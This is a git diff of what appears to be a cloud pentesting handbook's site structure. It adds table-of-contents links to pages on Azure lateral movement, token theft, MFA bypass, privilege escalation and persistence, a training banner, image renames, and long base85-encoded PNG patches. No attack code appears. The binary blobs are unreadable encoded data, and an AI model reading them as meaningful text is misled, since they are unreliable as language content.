+ - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+ - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
+ - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md)
+ - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md)
+ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md)
+ - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
+ - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
+ - [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md)
+ - [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
+ - [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
+ - [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md)
+ - [Az - Phishing Primary Refresh Token (Microsoft
Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md)
+ - [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md)
+ - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
+ - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
+ - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
+ - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
+ - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
+ - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
+ - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
+ - [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
+ - [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
+ - [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md)
+ - [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
+ - [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
+ - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
+ - [Az - App Services 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
+ - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
+ - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
+ - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
+ - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
+ - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
+ - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
+ - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
+ - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
+ - [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md)
+ - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md)
+ - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
+ - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
+ - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
+ - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
+ - [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)
+- [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md)
+ - [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md)
+ - [DO - Permissions for a 
Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md)
+ - [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md)
+ - [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md)
+ - [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md)
+ - [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md)
+ - [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md)
+ - [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md)
+ - [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md)
+ - [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md)
+ - [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md)
+ - [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md)
+ - [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md)
+ - [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md)
+- [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md)
+ - [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md)
+ - [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md)
+ - [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md)
+- [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md)
+ - [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md)
+ - [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md)
+ - [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md)
+ - [OpenShift - Jenkins Build Pod 
Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md)
+ - [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md)
+ - [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md)
+ - [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md)
+ - [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md)
+
+# 🛫 Pentesting Network Services
+
+- [HackTricks Pentesting Network$$external:https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network$$]()
+- [HackTricks Pentesting Services$$external:https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh$$]()
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
new file mode 100644
index 000000000..b03deaf4a
--- /dev/null
+++ b/src/banners/hacktricks-training.md
@@ -0,0 +1,13 @@
+> [!TIP]
+> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+>
+>
+>
+> Support HackTricks
+>
+> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+>
+>
diff --git a/.gitbook/assets/05-constraints.png b/src/images/05-constraints.png
similarity index 100%
rename from .gitbook/assets/05-constraints.png
rename to src/images/05-constraints.png
diff --git a/.gitbook/assets/2023-03-06 17_02_47-.png b/src/images/2023-03-06 17_02_47-.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_02_47-.png
rename to src/images/2023-03-06 17_02_47-.png
diff --git a/.gitbook/assets/2023-03-06 17_11_28-Window.png b/src/images/2023-03-06 17_11_28-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_11_28-Window.png
rename to src/images/2023-03-06 17_11_28-Window.png
diff --git a/.gitbook/assets/2023-03-06 17_11_43-Window.png b/src/images/2023-03-06 17_11_43-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_11_43-Window.png
rename to src/images/2023-03-06 17_11_43-Window.png
diff --git a/.gitbook/assets/2023-03-06 17_28_26-Window.png b/src/images/2023-03-06 17_28_26-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_28_26-Window.png
rename to src/images/2023-03-06 17_28_26-Window.png
diff --git a/.gitbook/assets/2023-03-06 17_28_50-Window.png b/src/images/2023-03-06 17_28_50-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_28_50-Window.png
rename to src/images/2023-03-06 17_28_50-Window.png
diff --git a/.gitbook/assets/CLOUD-logo-letters.svg b/src/images/CLOUD-logo-letters.svg
similarity index 100%
rename from .gitbook/assets/CLOUD-logo-letters.svg
rename to src/images/CLOUD-logo-letters.svg
diff --git a/src/images/CLOUD-web-logo.png b/src/images/CLOUD-web-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..1671d0bf87a70624ef869e65b3c7c0ef3a15905f GIT binary patch literal 14122 zcmeHt`CrXh{QpT2NgAR|*HmI!7-|gN2xTiFZMI3eCPZmZo0hA_GEv!UMyaIDQVbF; zZeuD-L`7-6N<}G=+rE6B=Y8MJ_b>Q99-kjRJsuv;`@GJ1?b|u${$XxrJW1wz8A8aU zbtbDV36bK`f8)nt=9Bz^Nc=a$Yt1$@gr@aq+sliO)HFWYr-+%xImv_xDsNkLf>EN1? zw!YBdefk4mE9?f2U9=tX?|E91)9qP1H@IZ|iigiimW#SdhHCOwROf!JAGjM=-{g>e zI@mj|zN_o>!=jdD!SyA^gLw;vidzl`c}K+!3>H5eF%Xsn)xGQS?dYi%eI6^zAtW?H zv1i2J&ZcJMeo=SYG(vXn782rpZ>H{r=iWDaoAXuT^yP@o97$=?Y2$qFK<1-0BiBZ* zJ|21~O`_@SmFkEY*Y+;m9TVJVPxzOWxI}eh^^L#mq{D~p0&}H^=B2}u#IdI>{)=JY(RDuIfIV@cH|@p{#Evsgm7nIx9pyQ2Ne$&)rE~AZXTef zw6c2WV3*(hzJtw5grqoNhy8)L+pmIW?)iv`GKy9$v*hiEhY?@j=n|6LV`oOlA;)Z= zizUH}3L({7b1X@(>d1M!MR{%!A<>FsrOBt?2IODmRc+IU6oZ;za!$2_^I%|CTMckD zug{ktB~a8}8)qdwLiU>BJMwPr_S=D?YsZd{AqxLMlarlQW>*EzVc2NuoHmVQ^|ZCw zMMX#u^XZ__YbrwwzbJ6X?&_d9O(}(0nEwR=-mgkmS=8_T$OidQ2I8oeb^9p~Jz8DD zktFc}m+~bHFJ-pH-E)5@Pl!mzjhwO{&|x_>w1vKRS4Jpbx(8%hB|;J(RIQgZcum)Z z5Nj}PSQ`{L>H4uh#t`cb_{u#ACF^2Od0KnjVyX)zXtcG=Tk(0fvlji9r{90i)C+PO zPx$lb$F3Sej>Ea)@lDl)%fOR#G=iNNs3hHa ztld*@KE<<&eqCyTlHF#5f~W94^vWp^NC@s!b!3G92PoU0{kpj;7wo#t!@9D{yeV%y z;Xg{hL+Z3|8Nb^uktAdljOymUbHYR-5I|iq7c#)Q&KPV+c@wG3%*WID7v0yiTxWuO z0$AlvvfC&@c&lL#v!r0BFlLVo_B1+WZ*IJyMaap=;3q3!(OANt3JN-zJ{RrQJ0NB^ zU{7J0cgw|+9ytjbgB)`5qbq_$par>+@9Q*M>&+)h0z>33cKkxhFrRHLvQ(_adL%a?VT+Twhs3uJsb}98SD!T zu1^`RS-;};GrQoyL(6&wRKDKM9=snloZZpi^XY5ctC_t6dEW+B^mGjj24xQypIR|c zRo~@z?BU38M&J)0T7DRI_}pK=tKM#MaJ_v{b6cFlpvcdz_U&3q@z9qO%*Ft2ES~)y|YGt648-D(%NL<>UOt(l|?}Z-kgXulOP+` zX5uL5T-+?8j zc8-H@7cM6J`&MowzD}q=G zJ;ssv*&|I-u|mV_UcY#c|- zCB{k{Ud_zjcT)M6=RS1pIIOjHu2^x%{-gY>9GU4P^=OEs>Z{DUZA(_)fdU_LC5ib& z?3yK7`yd;--T&r#r-S#7dA<5LErcU%l43 z>>*+^e&skh{=C-k14CP_I${7m4e$|vb=#5G=bY&Nrk}KlR*wFhx6Zc%oxM6h3`-a1TqtZMQW_S`gS|#!GaltF9qEFX?h-k`@kEJP4RuKY4{u= zF9ai>26H(zsE5ct5omHjkoe6Y+<}IOM$HY35gB1tb!k4CiI-R&& 
zXVRUI;xQX$Enl5`+7zMmFCDMUJ^g6`6t5Z^A{jruHQf5%bN?@e5W)*czo$rBkh3vf zlB#E!h9sJ2?ncg;<(}RE44p@?$qSnhW_)SX*g00Nv#r3hLA;P?{^_rN9*Prw2WzF3 zD?cemwvI%NH%+QDp+W5%g59fI!*|o&8WeDa1;FI-zpwxY3V=M!4me@_Y!;wM0g#IU zP(~D3z*Y)K5Cbad4k;EelLF#d!08Z4UI)w7QcE{d3OZ6#Leriqne28udAvbg>L#X>j*qj_CW z+{Q9I6_T7Bl>}Kwpfm~qUfEG?!Bqt>M*+~5?5MWX05~-YfVN~uwMA)|vw(&0dZiFn zDdS+CRjeSzzlTT)x3Pl!iDJe1TsmQvNK|+pv0fZ{SW>9ue6J=T@8EG08VfUYv7#k+ z>T2p4#U}waul8^JM{O4MfxW1eZd}pYAE^(>q8Q4-)v37AYLe1|UFFJuQb$|3M@TB8 zSXPpeK?bZ`cQfds4@>e?SXO4hl|LEho?b`o;|V{vWp%n2W&h?s;N=5+?q|<-}90mYIk4YX1=%6}(VF3vM zM6z7TK&alISU^4iC~8bx$l!F;3vWD&u!?ts9EVr||ABsjlIkAQFiqtjmW)pk>xzzf z>&1ebPmq-6i!~KL1r3MTlML6$ats%X*3$lh8IQ`g2lMmUc{&~y?Fh#3LS{W3YqNYN zVf+I-PsgZR)O3ag7*A*C>G*qgz6oPFcAk!>u=7Mx`V{NG@-V^`bFn>thc}7XtV_oe z=Eta>ff`hgAC^qDsg8ACzF_98|0ZftF&8=t`A|zGn_gYDS7p&DWU0iB-FPQdxM(}h%8`<$WbC|St1sc2%CMmxNnG_ z$`UcAMA$MS#5t2Ue?DAs7F?8sLiL^rVzcpZMCJKA``qf=v1B!efkHUX&bkRqR#HNi zioPJOpnN0fBaKz9(m4PkSU^4iTBCp%0APJubNLpK0kwg#k`k=XT_%n~=DGsqfJt3C z-%Con{VMJ@$Xd9dSv#^QHLTL>e%XlwHx%@pZMhe5?phluaiP=h|fly0u`N##FiDvpT>kyP4Ljci}4cA4&vMm4~3 zkC|W)M&n$n^ek!WzaQJe=c2=-hc=!se4k?Y)M|)3Vg$lL`?Ip8( zBIHx5-uejAYf|a=uF98?ZTe?|n6*ie^<-vSTX@o{f6Y;jbmq#)34NV=GId?9FxwG% zyz#+aA)0J^REz-NnpMXxy7cfgbJF_+-tBFyl##@&dhI7b&Ftd2Dc4pxjFZweethUU|8FjFTqKscPQbrnQvT$a9ShH4AHGhbn zM?%z%RvgHIPZM)AIyY79Hm##P#^b7nXP0;BOykoDglNJyE2HkE?9M_nPFwqU1%Q13 ze!o-$U$gP0QoqDVipp95WCNX|bFwRzNDz{Quk8KVxDYK>yXsSWU9kd(D8v0=D1D2W z{5#6B`7BB4n{zXc-KclIy)(cIC`_TQofY0g7p=C)SuAtK0WW?VNGQ(LNUgKIy>kb> z6G-|Qh(V^Gww`1S!Z~}JzL6-89>z_P0(QRfepcAF%gN{UbwwXa^9g7=Z80-nX159W ze8J&mh^r8bi&o{M9NbrZiY*$mIpVUU1fbOc+scNG_<})07YGo ziFe$J`wPRLfN*`#XQ|CyZWe@G-36L|dxSWOCM)J11WS%|!lOg#^;ZVmpq3~ot8%&9 zH~2*D>ic(>ab;$lFJa)&B=!1%2Y7ZwF}l{>lvg?t&?vRJUnoUL`BQ;}!Jdy& zo5k1>N|(TE>o>bi_o+WPVj}O2_j=>hGxt&;{US-}&dSmWSKqhcYR4MxW{`>1zK8I* zLeGGaexas;>6C00s1#i=GoM*f4<7x&<1J5()Tb~~4UM?FbaAY{(Pm~b4v507&i6ci zZykIDuVT)R)pw!oQ>cyxcRWI_*7z^OeTx=)9MJ=BD8&*%bS&>+$koAWx&azZtzb6% z_D)I=dI9CjZB`Q*XrI5d1u4zY@8ixQlEuW{3skXOMODF`U*4& 
zK}{eB5pP5ucW5;>ON`dMq4za(UXYtK)%p<*jE1=IGYoX0BH|)jSf^)ZK54SjSfUzn zSTgILSBPV87<56;sG|FxV6>DTW#O4iF{aL)>xsA^rci4K#Gl59PjAnlBzPYGfo~|b zpGKckb|*F?rMxkiQo@4x7I;8s*fv6Dp@(a2n5#|5YIr*S3ZP5&zw+I=S>BLx3f5p> z1B`H~;$M)aVX!RYkFmIkKnSEB+loo~X95ZHNE)ZAsNPu5+~xm&_%Hs478(}XlF~1; z-9xlv^b!7P5b^U1*p7eZKVFGrsrRKv&@pZ^4Q&mMA<>)sr<(YdpR`5W=+-}|cCIVd zU4~o=a6$8^`laG&a`4M3L>x54KU866e&jqgF}i2-i19lpzg?f}tR8_-399GD`aFw3)*!b@$4-K$mtLK|LwWUZ2CTO)fYL^&o-a(gL5u%B zj1mv(J5{}S3|)$_*nY$-q;>EWw4F+m*{3%Xt|kgc!_r10H6kMov5j)kc~{g>_1)F? zPVg=!x|>FqI>Ontc22WVv9m&wWWGkcL$rsUP^54l-=}w{T7Psd^LBUvNy0%C*(Uy1 zMJiYLbTeX*)*j^2-?G^JV)fo!-$vXUl%uOKXsMcT_0EAR7kZIUjsuWEQRv#Xrd^33 z4`VUlgRjI&Pemd1eF0Ur|3higuPT4{3MG9<$d2`h*_?j`78%345)~;AOcowSX3O@1 zqllAkyVT~TJx>ut^z+iaoi#4YKXWcSYRe(9@{pB1vEWeK`CDKHnJ1^vliS);2WsLP z00}>@EPzfwLcC{hP7H6pbq{5zqyeg=ouVRqE;p}%OA{xJaPN2e98p_QI8$ZPpoAR9 zfq@$i%W*&6nufU5ME70!`tH=#S>NV?F6aufqj3O%1x6-Hi4@Rd|h;Y9#u*hl+ulq z?XujJGwUc_I}2-94StZaum+}LJezQT&q&*Cf#}jX1Qi75C7&^YiUijYgR6jZI>mW= zuaL+!IcfVbn;;(dWJcO-OS;Jhex-y>#&pv>Y_i{>Z^U6XL2fyiXwjvD(+oP*21>HJ-_p)zx+f~D< zEN>y|Dhv1B3?mc4z2;Ulu?!=Sau?cz@YCwAlaNGoQ1^7MsKlz4`jvSzofDn}c-*#v zgN?fq(+o}k**fr^;8(dX`8-9fMZawIjpk8F&LWXK`g-%#ZmQBB?S-Te9Nwq8*nk8e z>zbSOHlU8XdN#8bJlR{gzo$I8(PnjRnRndcxb?@5e>=7yW70UnKWmN^{V*o=6{h#T zl)1DzVEB{#Es8ScB)aLyt%b=n;lFp(DE7P3u|Vkm?$&FpitssiektY+j(L>)?j zjv0|oqM?W>Eqb1@)Zus%JeEhxq}Q7hK{cK8B6d&&YoP(N_JOqpr#DdSn!vt4jay2^ zp=X`wkTCU&REP9*RA%LVg$km>g#o5bGhR$}6bgD}m0LI}GiP0(3+eev3-_|GsQj{f z-$@CsRCOFn9trMRC(2&1Xfh$3HTe=7HWr+2kEO=MYp~7@QG<7vUz7Z;`4=;n(twRX zz&0BeoW7=_N6~OlST<}bIBiB*d<7PFq;fqNjsFD}rKcG$p_~}QvYwY49#cVunsABb z)|`*b_F|k!!^700D1V{g&(A_Eh?_i!8*7U-A&0nZHfD*`Q6gz#B9#|GL}QxqgY_EF zAWr$b7uKBnFaFBRb_1*4l-2bGr#o^X&CR($=mUi7DMR!zu`9X3B!y~T18sv8OUj#) z8kOf7DyS9^QciPVuXDR>+ylIhGY&$3AYl46U+iAKuW*pOe5ZEP#gg-@RzGllb3*S0 zJj67AWBT$g9eob`r=Sm!C+Ap9AoUU7AQHoXRPD*<1lLNXs_1*g|jYXl=W|7IOVd^N%n z6yKSMJqcm-+FTq)JR#9e5UWId@glaD_(F!Ahfg~uvhx_XUS{W^X~!!Kk6&-)v_SAv zs7d9pS4Syo!q<5*B(=1AyX*@6)z|f&`@2)Q^r4y9%xTAh1<#vk(!m9v;d5xJVojO% 
zdIv%t?*j6>J9jM7j-c6quL=`+i%rCgU9=;-=sa#0R1b^AQpIUFH7-m&7Otd)yBLBYhF4o9i4}#{XII5vAO$f8o|~`b@2@*$#Be6 zNW^Oko%%0La@HucHxJ(JJJ=$7n)>53SneB57p(OZaP``G?X&VU82O7o> z*q;&PK00kXEBE)mE*2NQJqQ4UD-9-0*?tOkdw-f{JRhN9D84xr>q`az-@nBAjWrrVgWh;w2T5Ei7(uf26Q~E#*Z2Wz@omfEC6QXSBwH+pGr0b#1jB)0iZk! zav*?rO2gxWb$4o?Lfy@1#Ba_;N}-)Z^eq&&PYLZW7RSXce)xi;UaEo@#wxlD$HJSF z#hFL2L5oYe@7~}Bc{5?lpJ9osYbP7`9r{d87RUlF_saX(-hp{?Khx0Mi+0QHxTqo1 zLTry>)Cr+E>uxj9I&w_KiAYCXMviaK3b7aE!cBIRCLSgtlEje_P2UVqa6Zn*0fpy} zEo#`3+xN2YM81_7^zA^8#R^TQ?N-E|xeQJ6;~COb_-v`okAD8RvUd0mJX*Pj~#)ew*77GluXC zz=_qi1?g~0Z8(>Jd9zs~u4wGbjyUnHO~%X4oN2~C(^bd8Knk3b27wYD+=S)UoF~-j z)uI0wNcks~l0F}4u?cl8#HR(30Z0Lm#sbCxZ!|Q?0C-@1KMLS2#u!|DX(0e(*Hd-!ZaT%<$XqxfgNtBclmin=QCW}DSk!JIf1dcn+tHcSH{!HT;k*q z9?|NoVkCg5D@mN!D$CH{@4eo>e9_QI;-|vPNW{Y&Wm~4N3#y!JtAzZa$w?6AdURkI~-`kmDRW5n9PQ=?lyO6}^WYF>0l3 z**gFonP%?%)>tTgjOm|x|5=Ec3U7ytCBxe}xKf1z3Hcsx$bGDj<18CLyypHJ9EJ1KR|^LHPZH;{=zEtk1%yx zJNJ3GD>8wxQzOIFtLtNM=%pXXXSE2JEhvUp(EF6HLr*2G!CrGfDHRVFcV_@NdplRc zFex)bcBuS7eY#OHTOSQ^m1uawn$vq#hREZHVy;)x@Ho@4sv{O$<5)`;S-HRb<@3c% zn>Be)8nO-VWY;FMuO{+s%TCv9;X z1@7K=&Xc0Q#6V-x0% zH|5VAze8ZQPmh-+nIy5p`oSPqUWMy&P zfSXmI^*F+F`~)}DXv%t7uMkpYYvP_DO9a**;NoW$DvT7R3m*QnQM3i>PkV`VdJnjj zPoG_=)8CHYo{X7^AWA$DdL!WS(_k+T+(yTTO7bGS+;6VekS03*OAs_BiqhE>l&ArW z8JkQ63pc41-M}yP>}O+Qt}Q2^P3wJc3Z1Z@jOY5>iqZo=wYAN^(z{&?7yp!|189B@ z3>>OBGmY@(c_Er&=gUPL8t+#!y_Q1+{EtAi)Rx1E>UrP$Q;qcs&9Ows8nj;)7%8`z zKhU3UDnVrb;7jrwlKXuEM~u|=?X$I8akOU0{-X@hA!Fo-j4da|#lmjI5rrtM-EjhI zf5Mc8kH`B{jV%jS9P}nc5&ZJjD@xb;U(eVaIP|s2JuK364EeT3AR(A<%lYOs?dkB$ zzNd$aMplN+-6KI>%)$Do`Ev79{J$7T|FG%VuR%fG!=DqRW|iDn74~qh8tGh(t@pg# z-DYeKt+=Wlc`+|8^sJpt@vH8hAHFYpKNRKJesSd7t&KaEe!I7LXv5ihi&*aGgub3| z*M)Xvy0#I^y8ql5TCyVd-p744UG=r!T=yMX7S|J_o84$t)2lH}9=}TZRq*A<4-LFu zC5mq8B(D4La<=Neu7bReQQwm7{#x~D!TpU7ZyueRSJS;H^Vx!uqV$c={PY}(5A7>X zPQ10T(7D^7-izy9#)}B-nmKZvFPS=IG=cQ44Qn%x7?#3Q4=CI$(U^lOI!_8e>Pq)= zzpj8^*Xd&3?f85-oR^FsVUSjO2=ifx58Vey0ZIlE(&X4jBs88BHvW=8PoYLru`7ly 
z9A_qwFtqA1MZ0c3flK!NSWwiTXO1729W?KI}e33+!MrCfc3Mg?=W)5!&N(ro)xj|_Q2 zyr`^ulCn}iuRnsToAub8o^OdCVJ`t+!mpOa?+T?UU@iry7iSQSn=-k^{Ax?d{u(Akh=hmJMZ=g<_eSpW-JvJ%LUe zQ=7$ur#m3c+eY<&h?1TJQ6HWCtEsb})>R1|5~q(E?_UuGXU?8Vd^J_0i96 z!sr)fMAhuYjMigxhZ(KI=-Yu+5lO${=7*|d|5G*NFqKy0i3Nm2FPFg2U@tV-G8*Ua zN6_d5YSmTrEQL;@=L6V9WoVf*H*OlbB!941Y#ioS_A00E!>_vdp(ssPIai`1BZq7P zZzy2N61rrQ{;oMb9+d$K_|Yl-uJG=%7(fi2i~)VWxfdgwT_TJ@UTFa+oD0g(r#x&g{fK493ddoKP_9ZV$&-{mKJ_cXhe${@!>pYb=G^@=PZ!%=9G zq?owd+NrG6xAeZDN=O9^%lEvJbv5JRo5+sPJ#z`!s*Wj?5%YS_m+$U?rMd7q!>ySq zH{QqFCtyz$U66i$NWUW_9v$Fsko%>g5qjMMO3XC`4O1PAC$!8oDvDe6_GEb)u+D^E z2$I@e*8U|KdG|8ztc<}+g=I*@n!u*`M%$YKV~KD#WKjxH*jjQSqej|xCLuR~kY{4L zwdm1_bh$$Z;fHDk)hN?$%!Ur&Ffy0v{78p0n+RS2pc3 z9=<>R!Y%w5Nbx-G;Tn?tZR$rX?Cyy~-crHtuZ4G8A2%j{-fCRPQQkVUuQ=h$#=^YC zLG@Xg_Se*ddv4)#%d$x4g)Pm+`ip;Rsg2S7oS=I#qHytydvCh}%HCCO4At*`?lX8> z%Vki53|dTp7gz>d{~T%eDB^SLz(9ZhK!u<&e2fIKLfYbMJzc;3Y3ccbs207~7tKQ= zIKDZP8b5RrvTp-K@I2M9;@i3PfiMgo#cpeRr$he_GNrb-Q~B zzyHv8%WN{?DM0at77q-*-mUV>J+QO?$8$H;rB&{iHEzi#d^PBs9COxNVB3+CXWRVs zTi2#t)nDAN!3uL=9Ddn>sQbI0Z7n(wmAiY>E|c!4n}_~>_N)auUp)tvB+cu1K=5ws z*KV1uC-uz&AGUsQO?$zqet$RlVPfn4;#(zmVsEzxyq@71x1_t=ub<=7;ZXJB(2MBW oFIrn9$p8KQFVjGD%*aF?a@}Ly&Ix&gHz;%K)|jnMU&#ykAAFN7*8l(j literal 0 HcmV?d00001 
diff --git a/src/images/HT-TRAINING-web-logo.png b/src/images/HT-TRAINING-web-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..ca084e3529a5d1adde7f6be7c27d93fd67c8c250 GIT binary patch literal 16066 zcmeIZi9gi)7eD@*G4_2)_VuEqQW2G9LX^nPv|xlNVk%2WMvD4KD3XM+RI-jzSyCfK zR}qz^vL>=+DMLhk&wJFppL>75?_co!^mz2R8L#D>=Xsvxb>`f2*1OF3d8Bv{Li{_n zo7f^m(8d08alj{ILca0vAIX4iqyRhr0|CKqM?KM25C8q13Of$Fd3oA;x_N{g`O{Mm zAp?&cCR^=~zZ>iFq5t6(B0p(5F6ewNVJ5b=G1@^=8gIJCSAkonNTzsD#7%mPynK&v zRK=c)QHt6@2}!*i7LrBuBMm~$4P?F@=N+FpTo8RaohO`Qaan`IQIQH@^FNEhKaH^Unv1yDsBE;Q#&k9|HeF;Qs*x z!l#5(5IUQqadcb9Q;*Gdr%yg`5_DV}GctN=WV7{8rdmzbHaM`efah8kX* zd`~?hL_z3DDVwdQjY_r$vSeL3hVFfN>CF{@c*Xwv(`knOc!uo*u42vxrY-vY4+e)n66Wv<_4>Jum z4c~7c{{B&M+^})r@P@4$YqP^rBJ&9hgWY1oclCO!lE`Mm#>;SK!8%1LUSG-mMB1a7 z!~lngS<%+f>#h6)(LK4}Z^$v%ew{Pm($&z?(4wv&$W*o0XFscC+iW8~*Ece7)%WB> zQ~P1BZ%3JTWQtr$W`@kwz9#*++gU9d_D8RG^dBO$v@^mZQGxY-gz(j?V)fXiQv`?1 